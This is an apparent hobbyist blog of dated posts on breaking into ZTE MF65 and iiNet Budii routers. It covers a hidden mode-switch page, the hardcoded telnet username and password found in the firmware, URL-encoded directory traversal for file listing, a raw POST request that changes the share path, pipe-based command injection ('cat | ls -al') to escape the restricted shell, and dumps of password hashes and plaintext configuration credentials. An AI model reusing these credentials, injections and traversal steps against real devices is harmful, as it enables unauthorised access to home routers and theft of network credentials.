Saturday, 8 July 2017

///ZTE mf65 Mode Switch(Updated)///

///ZTE mf65 Mode Switch///

this page is uploaded to any web dir:

<body class="subpage_body_web" style="overflow-x:hidden;"  onLoad="initPage();">
<form name="mode_switch" action="/goform/goform_process" method="post" >
<INPUT type="hidden" value="MODE_SWITCH" name="goformId" id="goformId">
    <table cellspacing="0" cellpadding="10" width="100%" border="0" >
            <td valign="top">
        <table id="mode_setting_table" cellspacing=0 cellpadding=0 width=100% border=0 >
            <td><H1>Mode Switch:</H1></td>
            <td class="top_head" id="factory_mode_td">
            <input type="radio" value="FACTORY" name="switchCmd" id="switchCmd" class="radioStyle" <% asp_match("current_mode","FACTORY","checked"); %>
            <span id="factory_mode">Download Mode(DIAG+AT+MODEM)</span>
            <td class="head" id="debug_mode_td" >
            <input type="radio" value="DEBUG" name="switchCmd" id="switchCmd" class="radioStyle" <% asp_match("current_mode","DEBUG","checked"); %>
            <span id="debug_mode">Debug Mode(RNDIS+DIAG+AT+MODEM)</span>
            <td class="head" id="work_mode_td" >
            <input type="radio" value="WORK" name="switchCmd" id="switchCmd" class="radioStyle" <% asp_match("current_mode","WORK","checked"); %>
            <span id="work_mode">Work Mode(RNDIS)</span>
        <td class="head" >
    1. After you have selected and applyed the switch, check the page title for status, then refresh!
    <td class="head" >
        <td class="head" >
        To return to default mode Send AT+ZCDRUN=9 Then AT+ZCDRUN=F to COM(X) ZTE NMEA Device{??}
    <td class="head" >
       <div class="form-buttons">
            <input type="submit" class="btn-1 " trans="apply" align="center"/>


<script type="text/javascript" src="/js/lang.js"></script>
<script type="text/javascript">
var language = '<% asp_get("Language"); %>';
Butterlate.lang = language;
var current_mode   = '<% asp_get("current_mode"); %>';
var is_persist   = '<% asp_get("debug_mode_is_persist"); %>';
    function handleForm()
        if (document.mode_switch.mode[0].checked == true)
        document.getElementById("switchCmd").value = "FACTORY";
        else if (document.mode_switch.mode[1].checked == true)
        document.getElementById("switchCmd").value = "DEBUG";
        else if (document.mode_switch.mode[2].checked == true)
        document.getElementById("switchCmd").value = "WORK";

///////ZTE MF65 -- Unlocking A Few More features (Fastboot)

///////ZTE MF65 -- Unlocking A Few More features (Fastboot)


By changing the file that controls the menus
we can enable/disable a few more options like:







((#firewall ))


we simply remove the commenting out and re upload the file and this will enable
any function that has been left out;
use/see previous methods for ways to do this if unsure

[extra note]
this file can also be used to disable the httpshare for guests
this file can be used to either strengthen or weaken a routers structure and presentation to anyone able to access its the websever.

please be mindful of the closing brackets on the file

iiNet Budii(1031) (Telnet Access)(With Username and Password)

iiNet Budii(1031) (Telnet Access)
so telnet was always another open port available to us from the network,
although it never responded to any login attempts even if we 100% knew the password and user was correct;

This was solvable by one of two approaches.

The easiest by far was to simply grab the consumer release of the firmware,
inside its folders is a compilable c file for telnet (they've named it telnetc)

this is a pretty basic busybox telnet file
a few modifications have been made over the years
 one includes this little function

    telnet_data_set_autheninfo(&g_telnet_data, "iismshamswii", "i20U18r4E3");
    addr.s_addr = inet_addr("");
    telnet_data_set_serverinfo(&g_telnet_data, &addr, 23);

meaning that iismshamswii will work as the username
with i20U18r4E3 as the password
so we have logged in now we use iinet@sh to break the cli and we have full access to the router
searching the strings of the telnetc file on the router obtained by any earlier method will have provided thoses two peices of information as they are hardcoded into all of the routers using that firmware without that part being patched or otherwise dropping the telnet packets  

(extra note)
^^^can be password changed by admin with a external mips passwd program[usb], but only untill restart.

Wednesday, 17 May 2017

//////ZTE MF65 -- EFS acess method / partial Fs dump

In the last mf65 post
 we covered the local file listing method
 and briefly touched on the changes to the config file
 for constant file listing for the sd card functions

i managed to soft brick my device by directory transversal
on the sd card base path
basically the router would try and load the httpshare page,
get to the share path and sd base path,
ultimately just reading /mmc2/../
and it would just freak out and not load
so it sat around for a while.

Now im back and have a solution that,
 fixes my problem and gives us access to the internal files

we will need a windows machine (xp++)
 QPST, the modem drivers and

(ZTE WCDMA technologies MSM issue ??)
(if you cannot find the drivers keep looking they are around
try dcunlocker support files(i had to try several drivers before my machine acknowledged them))

using :

we get these devices
  • ZTE Diagnostics Interface (COMX)
  • ZTE NMEA Device (COMY)
  • ZTE Proprietary USB Modem 

 ((at this point if you do something stupid you may loose your router))))
 ***if you want to resume normal functions simply use****

Now we load up QPST configuration and it will point at our modem,
if not fix the settings to point it at the correct com port,
then start the efs explorer,
you will be taken to the primary partion, 
in which there is not much of interest,
by clicking into the secondary partion 
we see the file system we saw with the local file exploit,
the files can be copied out by right clicking on the file and selecting to save the file to pc
this is also great for any modification
 you would like to make to either the webservice or the other files,
just ensure you make a back up of the files,
 as they cannot be restored.
(warning i have not tested the modem after any modification to see if the sim services are still functioning) 

you can dump the nvram out with the QPST tools as well.
we really havent gained much of a new hold except now we have a way to effectively alter the web file system and we have gained  copys of two parts of the memory + 100% copy of the ztemodem.iso and a few other files that where not available for the webserver to load .  

Stay tuned as we continue to look for roots!!

Tuesday, 16 May 2017

iiNet Budii(1031) Local File Listing (USBwebserver)

This is a method to list the local files on the router via wftp (USBwebsever) :
Requires login and usb inserted into the aux usbports(fat/nfts)(*1)
Either goto:

To turn on the fileserver,
now point your browser here: 

(notice the URLencode because the straight transversal is rejected by the websever not even making its way to the app 
but with encoded slashes we beat the checks)

  and click save 

now we goto:

And we see our routers internal files.

we can wget out a copy of the systems memory with this enabled and scrape/view many of the files including the passwd file in the web browser:


iiNet Budii(1031) (UART based privesc attacks)

Opening the case we find a internal usb, we can also see a altera max jtag breakout, a large set of gpio pins and a UART breakout.

connecting to the uart and booting we can see the modem is running a broadcom firmware

CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.
Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel

the user names available to us are:

upon logging in we are brought into a console(d), the commands available to admin are :

help           logout      exit       quit     reboot       adsl       
xdslctl           xtm      brctl      cat     loglevel       logdest
virtualserver  ddns      df    dumpcfg   dumpmdm   meminfo
psp   kill    dnsproxy    syslog    echo  ifconfig   ping
ps    pwd        sntp     sysinfo      tftp   voice
wlctl wifidefault arp defaultgateway  dhcpserver  dns
endbg dac3120_dbg cpld_led  lan  lanhosts   passwd  ppp
restoredefault  route save  swversion  cfgupdate  swupdate
exitOnIdle  wan  7sl  factoryrestore  factorywifi sysreport
 audiotest   usbinfo  zigbeetest  stopzigbee  initzigbee

The user account is slightly less privileged than the admin.

a quick cat of etc/passwd or var/passwd gives us:

support:tByR37W8BPs8g:0:0:Technical Support:/:/bin/sh                          
user:hfO9hSymQzRIQ:0:0:Normal User:/:/bin/sh                                   
nobody:FpbmJjv2tUjNk:0:0:nobody for ftp:/:/bin/sh                              

the passwords are all UN=PW expect for iinetbob.(pword unknown)

Ok so bobs pword is supposed to be super long and i don't have it so i need more access, to see the file system..

We use a pipe | on cat or ping really anything will work at this point just that cat is cleaner

so we use :\

>cat | ls -al

Because the second command is not bound to console(d) we can use all of
the busy box/sh/ash command set but after the command we are returned to the console(d)

by inserting a usb into the internal port we can simply cp out the files we need

>cat | cp "/dev/mtd0" "/dev/mtd1" "/dev/mtd2" "/dev/mtd3" > (your drive)

Looking into the console(d) routines and its links to {lib file:libcms_cli}
 we find a table of hiddencmds
 one of them more interesting than others:

# DATA XREF: .data:cliHiddenCmdTable o


this command breaks out of console(d) without killing the supervisors (smd&ssk)
we can always use the cat trick and break into sh but it sometimes fouls the smd control.

the command can be used in both the user account and the admin account so if in theory the routers admin was locked we could use the user account and privesc commands to gain a high level access.

We are still very limited as too how far we can swing inside the commands as the smd and ssk respond to alot of the actions placed across the userland  (telnet & ssh)

The config files can be dumped via  >dumpmdm or dumpconfig

which will also dump the users and passwords with no encoding/hashes

<AdditionalHardwareVersion>BoardId=GGDV711_iiNet</AdditionalHardwareVersion>   <X_BROADCOM_COM_LoginCfg>

Till Next Time.

Friday, 24 June 2016

/////ZTE MF65 -- local file listing method 3(LFLM )The Full Package /////

/////ZTE MF65 -- local file listing method 3(LFLM )The Full Package /////

another super quick one for a even better listing in the web application with the ability to change your path via the sd card settings, we use the exploit from last time to gain a web app access to the web folder, this time though we have a little bit more work to do, so here we go from the start :

POST /goform/goform_set_cmd_process HTTP/1.1


using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager,
you will need to be logged in for this method.

so your work flow is:
  1. login
  2. send request to change path 
  3. logout
use the httpguest button to see the files

now we will navigate to web/js/config/ then we will download the config.js file and change the line :

 SD_BASE_PATH: /mmc2/



and reupload it as what ever name you would like i did config.js.1
 and then rename the original config.js then rename the new config to replace the old one, i wouldnt screw around for too long though as not having the config file may mess things up, now refresh your page and check you sd card settings page to see our changes,

 here i must

Warn againest changes of //web/js/config/config.js
Line : SD_BASE_PATH: /mmc2/
Againest any directory transverals. in any sense or method as they will not work...

any changes to this path that will reflect as " "(an empty path) will render the online sd functions unusable and returning to normal operation at this point is not available via the methods we can employ.. (we need telnet)

so dont upload the file with  /mmc2/../ or anything like that,

till next time,
shoot straight,